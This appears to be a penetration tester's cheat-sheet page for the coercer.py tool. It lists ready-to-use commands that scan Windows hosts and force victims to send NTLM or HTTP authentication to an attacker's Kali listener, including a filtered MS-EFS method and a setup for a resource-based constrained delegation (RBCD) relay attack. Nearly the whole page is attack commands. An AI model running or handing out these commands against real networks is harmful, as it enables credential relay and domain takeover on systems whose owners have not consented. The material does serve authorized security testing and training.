Skip to main content

coercer.py

Coercer coerces things to talk to other things!

Scan a host to see if it can be leveraged to coerce authentication

coercer.py scan -u lowpriv -p 'pass123!' -t some.victim.host

Coerce auth from a victim to a system of your choice

coercer.py coerce -u 7ms -p 'pass' -t SOME.VICTIM.IP.ADDY -l LOCAL.KALI.IP.ADDY

Coerce using a text list of targets

coercer.py coerce -u 7ms -p 'pass' --targets-file list-of-victims.txt -l LOCAL.KALI.IP.ADDY

Coerce using a specific method name (that you cleaned from the SCAN mode)

This example uses EpsRpcFileKeyInfo:

coercer.py coerce -u lowpriv -p 'password1' -t target.for.coercer.attack -l your.kali.ip.addy --filter-method-name EpsRpcFileKeyInfo

Coerce Web auth from a victim to pull off the RBCD attack

coercer.py coerce --auth-type http -l your.local.kali.ip -t ip.of.victim.machine -d domain.com -u lowpriv -p 'P@ssw0rd1' --filter-protocol-name MS-EFS

(More info about this in the ntlmrelay section)